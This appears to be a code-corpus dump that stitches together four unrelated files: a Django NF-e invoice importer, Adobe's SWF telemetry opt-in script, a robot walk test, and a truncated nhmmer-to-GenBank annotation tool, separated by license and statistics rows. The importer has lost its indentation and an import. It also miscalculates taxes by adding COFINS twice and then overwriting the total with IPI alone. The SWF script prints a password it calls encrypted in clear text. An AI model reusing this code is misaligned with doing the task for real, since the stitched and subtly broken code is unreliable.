from cadastro.models import Cidade, Bairro
from rh.models import Funcionario, PeriodoTrabalhado, Cargo, Departamento
from account.models import User
from optparse import make_option
import os, csv, datetime
from django.utils.encoding import smart_unicode, smart_str
from xml.dom import minidom
from producao.models import FabricanteFornecedor
from producao.models import NotaFiscal
class Command(BaseCommand):
help = '''
Importa Nota Fiscal
'''
args = "--file notafiscal.xml,"
option_list = BaseCommand.option_list + (
make_option('--file',
action='store_true',
dest='arquivo',
help='Importa uma nota fiscal',
),
)
def handle(self, *args, **options):
arquivo = options.get('arquivo')
if options['arquivo']:
f = args[0]
try:
xmldoc = minidom.parse(f)
infNFE = xmldoc.getElementsByTagName('chNFe')[0]
idnfe = infNFE.firstChild.nodeValue[22:34]
nome_emissor = xmldoc.getElementsByTagName('xNome')[0]
nome = nome_emissor.firstChild.nodeValue
print "NOME DO EMISSOR: %s" % nome
print "ID NOTA FISCAL %s" % idnfe
emissor = xmldoc.getElementsByTagName('emit')[0]
cnpj_emissor = xmldoc.getElementsByTagName('CNPJ')[0].firstChild.nodeValue
# busca emissor
fornecedor,created = FabricanteFornecedor.objects.get_or_create(cnpj=cnpj_emissor)
fornecedor.nome = nome
fornecedor.save()
if created:
print "Fornecedor CRIADO: %s" % fornecedor
else:
print "Fornecedor encrontrado: %s" % fornecedor
total = xmldoc.getElementsByTagName('total')[0]
frete = total.getElementsByTagName('vFrete')[0].firstChild.nodeValue
# criando NFE no sistema
nfe_sistema,created = NotaFiscal.objects.get_or_create(fabricante_fornecedor=fornecedor, numero=idnfe)
nfe_sistema.taxas_diversas = frete
nfe_sistema.save()
# pega itens da nota
itens = xmldoc.getElementsByTagName('det')
for item in itens:
# cada item da nota...
codigo_produto = item.getElementsByTagName('cProd')[0].firstChild.nodeValue
quantidade = item.getElementsByTagName('qCom')[0].firstChild.nodeValue
valor_unitario = item.getElementsByTagName('vUnCom')[0].firstChild.nodeValue
print u"ITEM: %s" % codigo_produto
print u"Quantidade: %s" % quantidade
print u"Valor Unitário: %s" % valor_unitario
# impostos
try:
aliquota_icms = float(item.getElementsByTagName('pICMS')[0].firstChild.nodeValue)
except:
aliquota_icms = 0
try:
aliquota_ipi = float(item.getElementsByTagName('pIPI')[0].firstChild.nodeValue)
except:
aliquota_ipi = 0
try:
aliquota_pis = float(item.getElementsByTagName('pPIS')[0].firstChild.nodeValue)
except:
aliquota_pis = 0
try:
aliquota_cofins = float(item.getElementsByTagName('pCOFINS')[0].firstChild.nodeValue)
except:
aliquota_cofins = 0
total_impostos = aliquota_ipi + aliquota_icms + aliquota_cofins + aliquota_cofins
total_impostos = aliquota_ipi
print "Valor %% ICMS: %s" % aliquota_icms
print "Valor %% IPI: %s" % aliquota_ipi
print "Valor %% COFNS: %s" % aliquota_cofins
print "Valor %% PIS: %s" % aliquota_pis
print "Incidência de %% impostos: %s" % total_impostos
# busca o lancamento, para evitar dois lancamentos iguais do mesmo partnumber
item_lancado,created = nfe_sistema.lancamentocomponente_set.get_or_create(part_number_fornecedor=codigo_produto)
# atualiza
item_lancado.quantidade= quantidade
item_lancado.valor_unitario= valor_unitario
item_lancado.impostos= total_impostos
# salva
item_lancado.save()
# busca na memoria automaticamente
item_lancado.busca_part_number_na_memoria()
# calcula total da nota
nfe_sistema.calcula_totais_nota()
# printa tudo
print "#"*10
print "NOTA %s importada" % nfe_sistema.numero
frete = nfe_sistema.taxas_diversas
produtos = nfe_sistema.total_com_imposto
print "TOTAL DA NOTA: %s (Frete) + %s (Produtos + Impostos)" % (frete, produtos)
print "Produtos"
for lancamento in nfe_sistema.lancamentocomponente_set.all():
print u"----- PN-FORNECEDOR: %s, QTD: %s VALOR: %s, Impostos: %s%% = TOTAL: %s Unitário (considerando frete proporcional) %s" % (lancamento.part_number_fornecedor, lancamento.quantidade, lancamento.valor_unitario, lancamento.impostos, lancamento.valor_total_com_imposto, lancamento.valor_unitario_final)
except FabricanteFornecedor.DoesNotExist:
print u"Erro. Não encontrado Fornecedor com este CNPJ"
except:
raise
else:
print self.help
print self.args
| lgpl-3.0 | 3,257,614,420,050,963,000 | 45.438462 | 323 | 0.549114 | false | 3.770768 | false | false | false |
shinho/SC2 | bin/add-opt-in.py | 1 | 7666 | #!/usr/bin/env python
# Copyright (c) 2012, Adobe Systems Incorporated
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Adobe Systems Incorporated nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''See readme or run with no args for usage'''
import os
import sys
import tempfile
import shutil
import struct
import zlib
import hashlib
import inspect
# Optional-dependency probe: LZMA-compressed SWFs (signature 'ZWS') can only
# be handled when the third-party PyLZMA package is importable.
supportsLZMA = False
try:
    import pylzma
    supportsLZMA = True
except:
    # PyLZMA is optional; a clear error is raised later only if it is needed.
    pass
####################################
# Helpers
####################################
class stringFile(object):
    """Minimal read-only file-like wrapper around an in-memory string.

    Used to present decompressed SWF data through the same read() interface
    as a real file object.  Works with either str or bytes payloads.
    """
    def __init__(self, data):
        self.data = data

    def read(self, num=-1):
        """Consume and return up to `num` characters/bytes.

        A negative (or None) `num` reads everything, matching file.read().
        The original implementation returned data[:-1] for the default
        num=-1, silently dropping the final byte.
        """
        if num is None or num < 0:
            result = self.data
            self.data = self.data[:0]  # empty value of the same type
        else:
            result = self.data[:num]
            self.data = self.data[num:]
        return result

    def close(self):
        self.data = None

    def flush(self):
        pass
def consumeSwfTag(f):
    """Read one SWF tag from file-like object f.

    Returns (tagType, tagBytes) where tagBytes is the raw tag including its
    RECORDHEADER.  The short header packs type and length into 16 bits
    little-endian; a length field of 0x3f signals a following 32-bit length.
    Raises Exception on a truncated stream.
    """
    header = f.read(2)
    if header == "":
        raise Exception("Bad SWF: Unexpected end of file")
    lo, hi = struct.unpack("BB", header)
    tagCode = ((hi & 0xff) << 8) | (lo & 0xff)
    tagType = tagCode >> 6
    tagLength = tagCode & 0x3f
    tagBytes = header
    if tagLength == 0x3f:
        # Long form: the real length follows as 4 little-endian bytes.
        longRaw = f.read(4)
        b0, b1, b2, b3 = struct.unpack("BBBB", longRaw)
        tagLength = ((b3 & 0xff) << 24) | ((b2 & 0xff) << 16) | ((b1 & 0xff) << 8) | (b0 & 0xff)
        tagBytes += longRaw
    tagBytes += f.read(tagLength)
    return (tagType, tagBytes)
def outputInt(o, i):
    """Write i to stream o as an unsigned 32-bit little-endian integer.

    The SWF format is little-endian throughout; the original used the
    native-order format 'I', which was only correct on little-endian hosts.
    '<I' matches the '<H'/'<HI' formats used elsewhere in this file.
    """
    o.write(struct.pack('<I', i))
def outputTelemetryTag(o, passwordClear):
    """Emit an EnableTelemetry (tag code 93) SWF tag on stream *o*.

    When *passwordClear* is given, its SHA-256 digest is appended so the
    player requires that password to view advanced telemetry.
    """
    TAG_CODE = 93
    passwordDigest = None
    bodyLength = 2  # the two reserved bytes
    if passwordClear:
        hasher = hashlib.sha256()
        hasher.update(passwordClear)
        passwordDigest = hasher.digest()
        bodyLength += len(passwordDigest)
    # Record header: the short form packs the length into the low 6 bits;
    # the long form (length >= 0x3f) stores it in a trailing 32-bit field.
    if bodyLength >= 63:
        o.write(struct.pack('<HI', TAG_CODE << 6 | 0x3f, bodyLength))
    else:
        o.write(struct.pack('<H', TAG_CODE << 6 | bodyLength))
    # Reserved 16-bit field.
    o.write(struct.pack('<H', 0))
    if passwordClear:
        o.write(passwordDigest)
####################################
# main()
####################################
if __name__ == "__main__":
    # NOTE: this script relies on Python 2 semantics throughout (binary
    # file reads return str and concatenate with "").
    ####################################
    # Parse command line
    ####################################
    if len(sys.argv) < 2:
        print("Usage: %s SWF_FILE [PASSWORD]" % os.path.basename(inspect.getfile(inspect.currentframe())))
        print("\nIf PASSWORD is provided, then a password will be required to view advanced telemetry in Adobe 'Monocle'.")
        sys.exit(-1)
    infile = sys.argv[1]
    passwordClear = sys.argv[2] if len(sys.argv) >= 3 else None
    ####################################
    # Process SWF header
    ####################################
    # The 3-byte signature selects the compression of everything after the
    # 8-byte header: FWS = none, CWS = zlib, ZWS = LZMA.
    swfFH = open(infile, 'rb')
    signature = swfFH.read(3)
    swfVersion = swfFH.read(1)
    struct.unpack("<I", swfFH.read(4))[0] # uncompressed length of file
    if signature == "FWS":
        pass
    elif signature == "CWS":
        decompressedFH = stringFile(zlib.decompressobj().decompress(swfFH.read()))
        swfFH.close()
        swfFH = decompressedFH
    elif signature == "ZWS":
        if not supportsLZMA:
            raise Exception("You need the PyLZMA package to use this script on \
LZMA-compressed SWFs. http://www.joachim-bauch.de/projects/pylzma/")
        swfFH.read(4) # compressed length
        decompressedFH = stringFile(pylzma.decompress(swfFH.read()))
        swfFH.close()
        swfFH = decompressedFH
    else:
        raise Exception("Bad SWF: Unrecognized signature: %s" % signature)
    f = swfFH
    # Rebuild the file into a temp stream; the length header is patched later.
    o = tempfile.TemporaryFile()
    o.write(signature)
    o.write(swfVersion)
    outputInt(o, 0) # FileLength - we'll fix this up later
    # FrameSize - this is nasty to read because its size can vary:
    # a RECT stores its per-field bit width in the first 5 bits.
    rs = f.read(1)
    r = struct.unpack("B", rs)
    rbits = (r[0] & 0xff) >> 3
    rrbytes = (7 + (rbits*4) - 3) / 8;
    o.write(rs)
    o.write(f.read((int)(rrbytes)))
    o.write(f.read(4)) # FrameRate and FrameCount
    ####################################
    # Process each SWF tag
    ####################################
    # Copy tags through verbatim, inserting the EnableTelemetry tag right
    # after FileAttributes (69), or after Metadata (77) when present.
    while True:
        (tagType, tagBytes) = consumeSwfTag(f)
        if tagType == 93:
            raise Exception("Bad SWF: already has EnableTelemetry tag")
        elif tagType == 92:
            raise Exception("Bad SWF: Signed SWFs are not supported")
        elif tagType == 69:
            # FileAttributes tag
            o.write(tagBytes)
            # Look ahead for Metadata tag. If present, put our tag after it
            (nextTagType, nextTagBytes) = consumeSwfTag(f)
            writeAfterNextTag = nextTagType == 77
            if writeAfterNextTag:
                o.write(nextTagBytes)
            outputTelemetryTag(o, passwordClear)
            # If there was no Metadata tag, we still need to write that tag out
            if not writeAfterNextTag:
                o.write(nextTagBytes)
            # Pull the next tag so the fall-through write below emits it.
            (tagType, tagBytes) = consumeSwfTag(f)
        o.write(tagBytes)
        if tagType == 0:
            break
    ####################################
    # Finish up
    ####################################
    # Fix the FileLength header
    uncompressedLength = o.tell()
    o.seek(4)
    o.write(struct.pack("I", uncompressedLength))
    o.flush()
    o.seek(0)
    # Copy the temp file to the outFile, compressing if necessary
    # (the input file is overwritten in place).
    outFile = open(infile, "wb")
    if signature == "FWS":
        shutil.copyfileobj(o, outFile)
    else:
        outFile.write(o.read(8)) # File is compressed after header
        if signature == "CWS":
            outFile.write(zlib.compress(o.read()))
        elif signature == "ZWS":
            compressed = pylzma.compress(o.read())
            outputInt(outFile, len(compressed)-5) # LZMA SWF has CompressedLength header field
            outFile.write(compressed)
        else:
            # NOTE(review): 'false' is not defined in Python (should be
            # False) — this would raise NameError if reached; it is
            # unreachable given the signature validation above.
            assert(false)
    outFile.close()
    if passwordClear:
        print("Added opt-in flag with encrypted password " + passwordClear)
    else:
        print("Added opt-in flag with no password")
| gpl-3.0 | 1,561,226,999,871,632,100 | 30.941667 | 132 | 0.594834 | false | 3.949511 | false | false | false |
aguirrea/lucy | tests/testBalieroWalk.py | 1 | 2371 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Andrés Aguirre Dorelo
# MINA/INCO/UDELAR
#
# Execution of individuals resulted from the Baliero and Pias work
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import glob
import os
import sys
import time
from configuration.LoadSystemConfiguration import LoadSystemConfiguration
from datatypes.DTIndividualGeneticMaterial import DTIndividualGeneticTimeSerieFile, DTIndividualGeneticMatrix
from datatypes.DTIndividualProperty import DTIndividualPropertyBaliero, DTIndividualPropertyPhysicalBioloid
from Individual import Individual
# Post-processing property sets: Baliero coordinate transform for the
# simulated robot, raw physical mapping for the real Bioloid hardware.
balieroProp = DTIndividualPropertyBaliero()
physicalProp = DTIndividualPropertyPhysicalBioloid()
conf = LoadSystemConfiguration()
# Directory holding the transformed Baliero/Pias walk files.
BalieroDir = os.getcwd()+conf.getDirectory("Baliero transformed walk Files")
# Number of command-line tokens (script name included).
arguments = len(sys.argv)
def createIndividual(filename):
    """Build an Individual for *filename*, choosing properties by config.

    A simulated Lucy ("Lucy simulated?" == 1) uses the Baliero property
    set; physical hardware uses the Bioloid physical property set.  The
    genetic material is loaded from the time-series file at *filename*,
    resolved relative to the current working directory.
    """
    simulated = int(conf.getProperty("Lucy simulated?")) == 1
    prop = balieroProp if simulated else physicalProp
    genetic = DTIndividualGeneticTimeSerieFile(os.getcwd() + "/" + filename)
    walk = Individual(prop, genetic)
    return walk
walk = Individual(balieroProp, DTIndividualGeneticMatrix()) #dummy individual to initialise the simulator and enable the time step configuration
walk.execute()
# Give the operator time to adjust the simulator time step in V-REP.
print "please set the proper time step in vrep"
time.sleep(5)
# With file arguments: run exactly those individuals; otherwise run every
# XML walk file found in the Baliero directory.
if arguments > 1:
    files = sys.argv[1:]
    for filename in files:
        print 'executing individual: ' + filename
        walk = createIndividual(filename)
        walk.execute()
else:
    for filename in glob.glob(os.path.join(BalieroDir, '*.xml')):
        print 'executing individual: ' + filename
        walk = createIndividual(filename)
        walk.execute()
| gpl-3.0 | 1,704,087,821,725,901,800 | 36.03125 | 144 | 0.745992 | false | 3.910891 | false | false | false |
nikolaichik/SigmoID | Python/RepeatGen.py | 1 | 23652 | import sys
import argparse
from time import process_time
import Bio
from Bio.SeqFeature import FeatureLocation
from Bio.SeqFeature import SeqFeature
from decimal import *
class MySeqFeature(SeqFeature):
    """SeqFeature with a human-readable, 1-based __str__ rendering."""

    def __str__(self):
        """Render type, location, id, qualifiers and any sub-features."""
        parts = ["type: %s\n" % self.type]
        if self.strand == 1:
            parts.append("location: [%s:%s](%s)\n" % (self.location.start+1,
                                                      self.location.end, '+'))
        if self.strand == -1:
            parts.append("location: [%s:%s](%s)\n" % (self.location.start+1,
                                                      self.location.end, '-'))
        if self.id and self.id != "<unknown id>":
            parts.append("id: %s\n" % self.id)
        parts.append("qualifiers:\n")
        for qual_key in sorted(self.qualifiers):
            parts.append("    Key: %s, Value: %s\n" % (qual_key,
                                                       self.qualifiers[qual_key]))
        # Newer Biopython releases dropped _sub_features; create it lazily
        # so the len() check below works on any version except 1.68.
        if Bio.__version__ != '1.68':
            if not hasattr(self, "_sub_features"):
                self._sub_features = []
        if len(self._sub_features) != 0:
            parts.append("Sub-Features\n")
            for sub_feature in self._sub_features:
                parts.append("%s\n" % sub_feature)
        return "".join(parts)
def is_within_feature(list_of_features, index, some_hit):
    """Return True when *some_hit* overlaps feature *index*, or when it sits
    entirely in the gap between feature *index* and the next one and the
    pair is convergent (feature *index* on '+', the next on another strand).

    'index' is the feature's position within *list_of_features*; the next
    feature (index + 1) is only consulted for the between-features case.
    """
    feat = list_of_features[index]
    hit = some_hit.location
    # Direct overlap: either hit endpoint falls strictly inside the feature.
    if feat.location.start < hit.start < feat.location.end:
        return True
    if feat.location.start < hit.end < feat.location.end:
        return True
    # Otherwise: strictly between this feature and a convergent neighbour.
    nxt = list_of_features[index + 1]
    return (feat.location.start < hit.start < hit.end < nxt.location.start
            and feat.strand == +1
            and feat.strand != nxt.strand)
def is_within_boundary(list_of_features, index, some_hit):
    """Check whether *some_hit* lies within the allowed -b/--boundary window
    at the start (strand +1) or end (strand -1) of feature *index*.

    Uses the global ``enter`` argparse namespace for the boundary length.
    NOTE(review): every branch returns on the first loop iteration, and the
    first element of ``list_of_features[index:]`` is the feature itself, so
    its gap test is trivially true — presumably the loop was meant to scan
    downstream features; confirm against upstream sources.
    """
    for feature in list_of_features[index:]:
        if (feature.location.start - list_of_features[index].location.end) < (enter.boundary+1):
            if (list_of_features[index].location.start+enter.boundary > \
                some_hit.location.end > \
                list_of_features[index].location.start and \
                list_of_features[index].strand == +1) or \
               (list_of_features[index].location.end-enter.boundary < \
                some_hit.location.start < \
                list_of_features[index].location.end and \
                list_of_features[index].strand == -1):
                return True
            else:
                return False
        else:
            return False
def qualifiers_function(qualifiers, var):
    """Parse 'key#value' strings into *var*, grouping values per key.

    Every entry of *qualifiers* must contain a '#'; otherwise the program
    exits with an error message.  For each key, *var* receives the list of
    distinct values in first-seen order.  *var* is mutated in place and
    also returned.
    """
    pairs = []
    for raw in qualifiers:
        if '#' not in raw:
            sys.exit('Please check your general qualifiers typing')
        pairs.append(raw.split('#'))
    for key_pair in pairs:
        key = key_pair[0]
        values = []
        for other in pairs:
            if other[0] == key and other[1] not in values:
                values.append(other[1])
        var[key] = values
    return var
def nhmm_parser(path_to_file, max_model_length):
    """Parse an nhmmer ``--tblout`` report into hit records.

    Returns ``[hits, max_model_length]`` where each hit is a list of
    [env_from, env_to, strand(+1/-1), E-value, bit score, target name,
    query name, hmm_from, hmm_to, ali_from, ali_to] and
    *max_model_length* becomes the largest hmm_to observed (used as the
    model length when -a/--alilen is not given; pass False to start).
    """
    x = []
    try:
        a = open(path_to_file, 'r')
    except IOError:
        sys.exit('Open error! Please check your nhmmer report input file!')
    r = a.readlines()
    b = []
    d = []
    e = []
    # Tokenize every non-comment line on single spaces, dropping empties.
    for index in range(len(r)):
        d.append([])
        if not r[index].startswith('#') or r[index].startswith('\n'):
            item = r[index].split(' ')
            if len(item) >= 2:
                for part in item:
                    if part != '' and len(part) != 0:
                        part = part.replace('\n', '')
                        d[index].append(part)
    # Keep non-empty token rows only.
    for index in range(len(d)):
        if len(d[index]) != 0:
            b.append(d[index])
    # Rows with too few columns are wrapped lines: prepend them to the next
    # row so each logical record is contiguous again.
    for index in range(len(b)):
        if len(b[index]) <= 10:
            for number in range(len(b[index])):
                b[index+1].insert(number, b[index][number])
    for index in range(len(b)):
        if len(b[index]) > 10:
            e.append(b[index])
    for item in e:
        for num_of_spaces in range(len(e[0])):
            # to avoid problems with additional spaces... e[0] - firstly
            # splitted string by ' '; slide the column offset until the
            # numeric fields parse cleanly.
            try:
                # item[11]+'1' turns the strand char '+'/'-' into +1/-1.
                x.append([item[8+num_of_spaces],
                          item[9+num_of_spaces],
                          int(item[11+num_of_spaces]+'1'),
                          float(item[12+num_of_spaces]),
                          float(item[13+num_of_spaces]),
                          item[0+num_of_spaces],
                          item[1+num_of_spaces],
                          int(item[4+num_of_spaces]),
                          int(item[5+num_of_spaces]),
                          int(item[6+num_of_spaces]),
                          int(item[7+num_of_spaces])
                          ])
                # Track the largest hmm_to as the effective model length.
                if max_model_length is False:
                    max_model_length = int(item[5+num_of_spaces])
                elif max_model_length is not False and \
                        int(item[5+num_of_spaces]) > max_model_length:
                    max_model_length = int(item[5+num_of_spaces])
                else:
                    pass
            except ValueError:
                # Wrong offset: retry with the next column shift.
                pass
            else:
                break
    return [x, max_model_length]
def nhmm_prog(path_to_file, e):
    """Append program/version tokens from an nhmmer report header to *e*.

    Scans the report for '# Program:' and '# Version:' lines, splits them
    on single spaces and appends every non-empty token to *e* (mutated in
    place).  The file handle is left to the garbage collector, matching the
    original tool's behaviour.
    """
    handle = open(path_to_file, 'r')
    header_lines = [line for line in handle.readlines()
                    if line.startswith(('# Program:', '# Version:'))]
    for tokens in (line.split(' ') for line in header_lines):
        e.extend(piece for piece in tokens if piece != '')
    return
def sorting_output_features(lst):
    """Extract nhmmer bit scores from the 'note' qualifier of each feature.

    Notes look like '<prog> score <bits> E-value <ev>', so the
    third-from-last space-separated token is the bit score.  Returns the
    scores as floats, in feature order.
    """
    scores = []
    for feature in lst:
        for key in feature.qualifiers.keys():
            if key != 'note':
                continue
            tokens = feature.qualifiers[key].split(' ')
            scores.append(float(tokens[-3]))
    return scores
def score_parser(some_feature):
    """Return the nhmmer bit score stored in a feature's 'note' qualifier.

    The note may be a single string or a list of note strings; in the list
    case the first entry starting with 'nhmmer' is used.  Returns None when
    no score-bearing note exists.
    """
    for key, value in some_feature.qualifiers.items():
        if key != 'note':
            continue
        if type(value) == list:
            for note in value:
                if note.startswith('nhmmer'):
                    return float(note.split(' ')[-3])
        else:
            return float(value.split(' ')[-3])
def output(score_list, output_features):
    """Print features in the order dictated by *score_list*.

    For every score value, each feature whose bit score matches is printed
    and then filtered out of the working list, so repeated scores print
    distinct features.  The caller's list object is never mutated (only
    rebound locally).
    """
    remaining = output_features
    for val in score_list:
        for some_feature in remaining:
            if val == feature_score(some_feature):
                print(some_feature)
                remaining = [f for f in remaining if f != some_feature]
def feature_score(some_feature):
    """Return the nhmmer bit score from a feature's 'note' qualifier.

    Mirrors score_parser(): the note may be a plain string or a list of
    note strings (the first one starting with 'nhmmer' wins).  Returns
    None when no score-bearing note exists.

    Bug fixed: the original guard compared a type object against an empty
    list (``type(x) != []``), which is always true, so a list-valued note
    fell through to ``str.split`` and raised AttributeError.
    """
    for key in some_feature.qualifiers.keys():
        if key != 'note':
            continue
        value = some_feature.qualifiers[key]
        if type(value) == list:
            for note in value:
                if note.startswith('nhmmer'):
                    return float(note.split(' ')[-3])
        else:
            return float(value.split(' ')[-3])
def dna_topology(path, topo_list):
    """Return the lines of *path* with every LOCUS line replaced in order.

    Works around Biopython emitting an incorrect DNA topology field
    (https://github.com/biopython/biopython/issues/363): the caller
    supplies the corrected LOCUS lines in *topo_list*, one per locus, and
    they are substituted positionally.
    """
    with open(path, 'r') as infile:
        lines = infile.readlines()
    locus_index = 0
    for position, line in enumerate(lines):
        if line.startswith('LOCUS'):
            lines[position] = topo_list[locus_index]
            locus_index += 1
    return lines
def createparser():
    """Build and return the RepeatGen command-line argument parser.

    Positional arguments: nhmmer tblout report, input GenBank file, output
    GenBank file.  Options control filtering (length, E-value, score,
    coverage), placement (inside CDS, boundary), deduplication, and the
    feature key/qualifiers written for each hit.
    """
    parser = argparse.ArgumentParser(
        prog='RepeatGen',
        usage='\n%(prog)s <report_file> <input_file> <output_file> [options]',
        description='''This script allows to add features to a genbank \
file according to nhmmer results.\
Requires Biopython 1.64 (or newer)''',
        epilog='(c) Aliaksandr Damienikan, 2018.')
    parser.add_argument('report_file',
                        help='path to nhmmer report file produced with \
-tblout option.')
    parser.add_argument('input_file',
                        help='path to input Genbank file.')
    parser.add_argument('output_file', help='path to output Genbank file.')
    # -L accepts either a single max length or a min:max range.
    parser.add_argument('-L', '--length',
                        default=False,
                        help='annotate features of specified length (range of lengths).',
                        metavar='<int>/<int:int>',
                        required=False,
                        type=str)
    parser.add_argument('-q', '--qual',
                        default='',
                        metavar='<key#"value">',
                        nargs='*',
                        dest='qual',
                        help='''add this qualifier to each annotated \
feature.''')
    parser.add_argument('-p', '--palindromic',
                        action='store_const',
                        const=True,
                        default=False,
                        help='''filter palindromic repeats.''')
    parser.add_argument('-E', '--eval',
                        default=False,
                        type=float,
                        metavar='<float or integer>',
                        help='''threshold E-Value.''')
    parser.add_argument('-S', '--score',
                        default=False,
                        type=float,
                        metavar='<float or integer>',
                        help='''threshold Bit Score.''')
    parser.add_argument('-c', '--coverage',
                        default=0.5,
                        type=float,
                        metavar='<float>',
                        help='''minimal coverage for input model (default is 0.5)''')
    parser.add_argument('-i', '--insert',
                        action='store_const',
                        const=True,
                        default=False,
                        help='''don't add features inside CDS.''')
    parser.add_argument('-a', '--alilen',
                        type=int,
                        default=False,
                        metavar='<integer>',
                        help='''set profile alignment length (the largest hmm_to if not specified).''')
    parser.add_argument('-b', '--boundary',
                        type=int,
                        default=0,
                        metavar='<integer>',
                        help='''set allowed length boundary for hits being within features.''')
    parser.add_argument('-d', '--duplicate',
                        action='store_const',
                        const=True,
                        default=False,
                        help='''no duplicate features with the same location \
and the same rpt_family qualifier
value.''')
    parser.add_argument('-v', '--version',
                        action='version',
                        version='%(prog)s 1.3 (April 6, 2021)')
    parser.add_argument('-f', '--feature',
                        metavar='<"feature key">',
                        default='unknown type',
                        help='''feature key to add (promoter, protein_bind \
etc.)''')
    return parser
t_start = process_time()
args = createparser()
enter = args.parse_args()
# NOTE(review): sys.argv[1:0] is always an empty slice — probably meant
# sys.argv[1:]; 'arguments' is unused below, so this is harmless here.
arguments = sys.argv[1:0]
max_eval = enter.eval
# Split -L into (min_length, max_length); a single value means "exact".
if enter.length is not False:
    enter.length = enter.length.split(':')
    if len(enter.length) == 1:
        enter.min_length = False
        enter.max_length = int(enter.length[0])
    else:
        enter.min_length = int(enter.length[0])
        enter.max_length = int(enter.length[1])
if not 0 <= enter.coverage <= 1:
    sys.exit('Coverage value is invalid, please specify values in 0.0-1.0 range')
try:
    from Bio import SeqIO
except ImportError:
    sys.exit('\nYou have no Biopython module installed!\n\
You can download it here for free: \
http://biopython.org/wiki/Download\n')
try:
    input_handle = open(enter.input_file, 'r')
except IOError:
    sys.exit('Open error! Please check your genbank input file!')
# Remember the original LOCUS lines so topology info can be restored into
# the rewritten output at the end (Biopython issue #363 workaround).
circular_vs_linear = []
for line in input_handle.readlines():
    if line.startswith('LOCUS'):
        circular_vs_linear.append(line)
input_handle.close()
input_handle = open(enter.input_file, 'r')
if enter.input_file == enter.output_file:
    sys.exit('Sorry, but we can\'t edit input file. Plese give another name \
to output file!')
try:
    output_handle = open(enter.output_file, 'w')
except IOError:
    sys.exit('Open error! Please check your genbank output path!')
print ('\nRepeatGen 1.0 (January 6, 2018)')
print ("="*50)
print ('Options used:\n')
for arg in range(1, len(sys.argv)):
    print (sys.argv[arg])
file_path = enter.report_file
# 'CHECK' marks features added in this run so they can be filtered later.
qualifier = {'CHECK': 'CHECKED!'}
qualifiers_function(enter.qual, qualifier)
prog = []
maxlen = 0
parser_result = nhmm_parser(file_path, maxlen)
allign_list = parser_result[0]
if enter.alilen is False:
    model_length = parser_result[1] # if allignment length is not specified, maximal observed hmm_to is used
else:
    model_length = enter.alilen
nhmm_prog(file_path, prog)
prog[2] = prog[2].replace('\r', '')
records = SeqIO.parse(input_handle, 'genbank')
allowed_types = ['CDS', 'ncRNA', 'sRNA', 'tRNA', 'misc_RNA']
total = 0
# Main per-contig loop: insert nhmmer hits as features, filter, then write.
for record in records:
    print ('\n' + "-"*50 + "\nCONTIG: " + record.id)
    print ('\n FEATURES ADDED: \n')
    # Gene-like features used for placement/filtering decisions.
    allowed_features_list = []
    for feature in record.features:
        if feature.type in allowed_types:
            allowed_features_list.append(feature)
    try:
        cds_loc_start = allowed_features_list[0]
    except:
        cds_loc_start = record.features[0]
    try:
        cds_loc_end = allowed_features_list[-1]
    except:
        cds_loc_end = record.features[-1]
    for allign in allign_list:
        from Bio import SeqFeature
        # Normalize env/ali coordinates so start < end regardless of strand.
        if allign[2] == +1:
            env_start = int(allign[0]) #env_from
            env_end = int(allign[1]) #env_to
            strnd = int(allign[2])
            e_value = float(allign[3])
            score = allign[4]
            locus = allign[5]
            version = allign[6]
            hmm_from = allign[7]
            hmm_to = allign[8]
            hmm_diff = hmm_to - hmm_from
            getcontext().prec = 4
            hmm_coverage = Decimal((hmm_diff+1))/Decimal(model_length)
            ali_start = allign[9]
            ali_end = allign[10]
            ali_diff = ali_end - ali_start
        else:
            env_start = int(allign[1]) #env_to
            env_end = int(allign[0]) #env_from
            strnd = int(allign[2])
            e_value = float(allign[3])
            score = allign[4]
            locus = allign[5]
            version = allign[6]
            hmm_from = allign[7]
            hmm_to = allign[8]
            hmm_diff = hmm_to - hmm_from
            getcontext().prec = 4
            hmm_coverage = Decimal((hmm_diff+1))/Decimal(model_length)
            ali_start = allign[10]
            ali_end = allign[9]
            ali_diff = ali_end - ali_start
        start_pos = SeqFeature.ExactPosition(env_start-1)
        end_pos = SeqFeature.ExactPosition(env_end)
        feature_length = env_end - (env_start-1)
        feature_location = FeatureLocation(start_pos, end_pos)
        feature_type = enter.feature
        from Bio.SeqFeature import SeqFeature
        note_qualifier = dict()
        note_qualifier['note'] = str('%s score %s E-value %s' %
                                     (prog[2].replace('\n', ''),
                                      score,
                                      e_value))
        my_feature = MySeqFeature(
            location=feature_location,
            type=feature_type,
            strand=strnd,
            qualifiers=dict(list(qualifier.items()) +
                            list(note_qualifier.items())))
        # Keep the hit only if it passes coverage, length and score gates.
